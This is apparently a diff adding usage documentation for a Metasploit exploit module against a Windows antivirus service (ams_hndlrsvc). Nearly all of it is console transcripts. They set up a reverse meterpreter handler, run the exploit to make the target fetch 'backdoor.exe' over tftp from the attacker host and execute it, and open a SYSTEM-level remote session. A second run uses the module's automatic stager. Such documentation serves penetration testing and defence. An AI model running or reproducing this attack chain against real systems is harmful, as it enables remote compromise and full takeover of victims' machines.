+
+msf > use exploit/multi/handler 
+payload => windows/meterpreter/reverse_tcp
+msf exploit(handler) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf exploit(handler) > set lport 4444
+lport => 4444
+msf exploit(handler) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Starting the payload handler...
+msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc 
+msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
+rhost => 2.2.2.2
+msf exploit(ams_hndlrsvc) > set lport 9999
+lport => 9999
+msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
+CMD => tftp -i 1.1.1.1 GET backdoor.exe
+msf exploit(ams_hndlrsvc) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
+[*] Exploit completed, but no session was created.
+msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
+cmd => backdoor.exe
+msf exploit(ams_hndlrsvc) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
+[*] Sending stage (957999 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
+[*] Exploit completed, but no session was created.
+msf exploit(ams_hndlrsvc) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type                   Information                 Connection
+  --  ----                   -----------                 ----------
+  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WEBB  1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
+
+msf exploit(ams_hndlrsvc) > sessions -v
+
+Active sessions
+===============
+
+  Session ID: 1
+        Type: meterpreter x86/win32
+        Info: NT AUTHORITY\SYSTEM @ WEBB
+      Tunnel: 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
+         Via: exploit/multi/handler
+        UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
+   MachineID: 8b2889ec93a961f2cc3f2db4620def57
+     CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
+  Registered: No
+
+
+
+msf exploit(ams_hndlrsvc) > 
+
+  ```
+  
+### Using Standard Options
+  
+  ```
+msf > use exploit/windows/antivirus/ams_hndlrsvc 
+msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
+rhost => 2.2.2.2
+msf exploit(ams_hndlrsvc) > set lport 4445
+lport => 4445
+msf exploit(ams_hndlrsvc) > show options
+
+Module options (exploit/windows/antivirus/ams_hndlrsvc):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD                     no        Execute this command instead of using command stager
+   LHOST  1.1.1.1     no        The listen IP address from where the victim downloads the payload
+   RHOST  2.2.2.2   yes       The target address
+   RPORT  38292            yes       The target port
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     1.1.1.1     yes       The listen address
+   LPORT     4445             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Universal
+
+
+msf exploit(ams_hndlrsvc) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4445 
+[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
+[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
+[*] 2.2.2.2:38292 - Attempting to execute the payload...
+[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
+[*] Sending stage (957999 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400
+
+meterpreter > 
+
+  ```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .6.1
 .6.2